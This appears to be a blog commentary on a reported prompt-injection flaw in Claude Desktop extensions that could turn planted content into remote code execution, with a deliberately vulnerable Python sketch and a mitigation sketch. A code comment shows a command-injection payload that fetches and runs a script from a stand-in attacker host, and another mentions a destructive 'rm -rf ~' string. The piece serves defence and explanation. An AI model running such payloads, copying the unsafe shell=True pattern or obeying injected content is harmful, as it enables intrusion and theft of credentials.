According to Infosecurity Magazine, researchers at Koi Security found that three of Anthropic’s official Claude Desktop extensions were vulnerable to prompt injection attacks. The vulnerabilities, reported through Anthropic’s HackerOne program on July 3 and rated as high severity with a CVSS score of 8.9, affected the Chrome, iMessage and Apple Notes connectors. These Model Context Protocol servers allow Claude to act on behalf of users by connecting to web services and applications. Unlike browser extensions, which run in a sandbox, Claude Desktop extensions run unsandboxed with full system permissions, meaning they can read files, execute commands, and access credentials. Because the connectors passed untrusted content into commands without sanitization, an attacker who planted crafted content that Claude Desktop later accessed could turn an ordinary question to Claude into remote code execution.
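The report doesn’t reproduce the connectors’ code, but the vulnerability class is easy to illustrate. Here is a minimal, hypothetical sketch of the pattern: a tool handler that shells out with unsanitized input, so content the model merely reads can escape into a command. The handler name and the notes-cli tool are invented for illustration; this is not Anthropic’s actual code.

```python
import subprocess

def search_notes_vulnerable(query: str) -> str:
    """Hypothetical extension tool that searches local notes via a CLI.

    `query` may contain text that originated from a web page or message the
    model was asked to summarize, i.e. attacker-controlled content.
    """
    # DANGEROUS: shell=True plus string interpolation means a query like
    #   '"; curl http://attacker.example/payload.sh | sh; echo "'
    # breaks out of the intended command and runs arbitrary code with the
    # extension's full system permissions.
    result = subprocess.run(
        f'notes-cli search "{query}"',  # notes-cli is a made-up tool
        shell=True,
        capture_output=True,
        text=True,
    )
    return result.stdout
```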
Why this matters
Here’s the thing about AI assistants: we’re giving them unprecedented access to our systems, but the security models haven’t quite caught up. These weren’t sandboxed browser plugins with narrow permissions. They ran with full system access, which is basically handing over the keys to your digital kingdom. And the scary part? Claude would execute malicious commands thinking it was just helping you out. That’s the fundamental risk with these AI-powered tools: they’re designed to be helpful, but that helpfulness can be weaponized.
Broader implications
This incident really highlights the growing pains in the AI assistant space. Every major player – Google with Gemini, Microsoft with Copilot, OpenAI with ChatGPT – is racing to integrate their models deeper into our workflows. But security often takes a backseat to functionality. Think about it: how many companies are properly vetting these AI extensions before rolling them out to employees? Probably not enough.
The timing is particularly interesting given the recent surge in AI adoption. Companies are desperate to stay competitive, but incidents like this show we might be moving too fast. When an extension can potentially grab your SSH keys or AWS credentials, that’s not just a minor security issue – that’s a business-ending risk for many organizations.
What’s next
I suspect we’ll see a wave of similar discoveries across other AI platforms. Koi Security demonstrated how these vulnerabilities work, and now every security researcher is probably looking at other AI extensions with fresh eyes. The industry needs to develop proper sandboxing and permission models specifically for AI tools, rather than just treating them like traditional software.
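To make that concrete, here is a rough sketch of one mitigation pattern: never hand tool arguments to a shell, execute only allowlisted binaries, and pass untrusted strings as plain argument-vector entries so injected syntax stays inert. The allowlist, names, and policy here are assumptions for illustration, not anything specified by Anthropic or the MCP spec.

```python
import subprocess

ALLOWED_BINARIES = {"notes-cli", "grep"}  # hypothetical per-extension allowlist

def run_tool_safely(binary: str, *args: str) -> str:
    """Run an allowlisted binary with untrusted arguments, without a shell."""
    if binary not in ALLOWED_BINARIES:
        raise PermissionError(f"{binary} is not on the extension's allowlist")
    # Passing a list with shell=False means the untrusted strings become plain
    # argv entries rather than shell syntax, so '"; rm -rf ~' stays inert text.
    result = subprocess.run(
        [binary, *args],
        shell=False,
        capture_output=True,
        text=True,
        timeout=10,
    )
    return result.stdout

# Usage: even if `query` carries injected instructions from a web page,
# it cannot escape into the shell.
# print(run_tool_safely("notes-cli", "search", query))
```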
For users, the takeaway is clear: be extremely careful about what extensions you install, even from official marketplaces. Just because something comes from Anthropic or another big name doesn’t mean it’s automatically safe. The AI security landscape is still evolving, and we’re all basically beta testers whether we realize it or not.
